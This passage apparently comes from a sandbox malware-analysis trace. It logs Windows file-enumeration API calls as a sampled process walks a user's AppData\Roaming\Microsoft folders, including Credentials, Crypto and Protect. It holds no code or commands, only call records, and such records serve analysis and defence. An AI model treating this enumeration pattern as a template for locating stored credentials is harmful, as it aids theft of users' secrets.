dwReserved1=0x0, cFileName="AddIns", cAlternateFileName="")) returned 1 [0281.450] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x285f4ad0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bibliography", cAlternateFileName="BIBLIO~1")) returned 1 [0281.450] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0281.450] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0281.450] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Document Building Blocks", cAlternateFileName="DOCUME~1")) returned 1 [0281.450] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Excel", cAlternateFileName="")) returned 1 [0281.450] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795fff90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0281.450] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0281.450] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28666ef0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b32ecd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b32ecd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0281.450] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x500531d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5b267fb0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x5b267fb0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0281.450] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42694660, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x42694660, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x42694660, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof", cAlternateFileName="")) returned 1 [0281.450] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x30b088f0, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x30b088f0, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Protect", cAlternateFileName="")) returned 1 [0281.450] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0281.450] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x21509730, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3e1d8b20, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x3e1d8b20, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0281.451] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x426ba7c0, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UProof", cAlternateFileName="")) returned 1 [0281.451] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0281.451] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x286ff470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x286ff470, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x286ff470, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 1 [0281.451] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x286ff470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x286ff470, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x286ff470, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 0 [0281.451] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c4) returned 1 [0281.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43ea24) returned 1 [0281.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9d0) returned 1 [0281.483] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft", nBufferLength=0x105, lpBuffer=0x43e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft", lpFilePart=0x0) returned 0x2c [0281.483] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x43e780 | out: lpFindFileData=0x43e780*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.483] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.483] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3b3af0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3b3af0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3b3af0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AddIns", cAlternateFileName="")) returned 1 [0281.483] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x285f4ad0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bibliography", cAlternateFileName="BIBLIO~1")) returned 1 [0281.483] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0281.484] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0281.484] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Document Building Blocks", cAlternateFileName="DOCUME~1")) returned 1 [0281.484] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Excel", cAlternateFileName="")) returned 1 [0281.484] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795fff90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0281.484] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0281.484] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28666ef0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b32ecd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b32ecd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0281.484] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x500531d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5b267fb0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x5b267fb0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0281.484] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42694660, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x42694660, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x42694660, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof", cAlternateFileName="")) returned 1 [0281.484] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x30b088f0, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x30b088f0, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Protect", cAlternateFileName="")) returned 1 [0281.484] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0281.484] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x21509730, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3e1d8b20, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x3e1d8b20, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0281.484] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x426ba7c0, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UProof", cAlternateFileName="")) returned 1 [0281.484] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0281.484] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x286ff470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x286ff470, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x286ff470, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 1 [0281.484] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.484] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e740) returned 1 [0281.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e9a0) returned 1 [0281.485] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\AddIns", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\AddIns", lpFilePart=0x0) returned 0x33 [0281.485] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.485] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\AddIns", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\AddIns", lpFilePart=0x0) returned 0x33 [0281.485] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\AddIns\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3b3af0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3b3af0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3b3af0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.485] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3b3af0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3b3af0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3b3af0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.485] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3b3af0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3b3af0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3b3af0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0281.485] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.486] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.486] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography", lpFilePart=0x0) returned 0x39 [0281.486] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.486] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography", lpFilePart=0x0) returned 0x39 [0281.486] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x285f4ad0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.486] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x285f4ad0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.486] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2861ac30, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Style", cAlternateFileName="")) returned 1 [0281.486] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2861ac30, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, 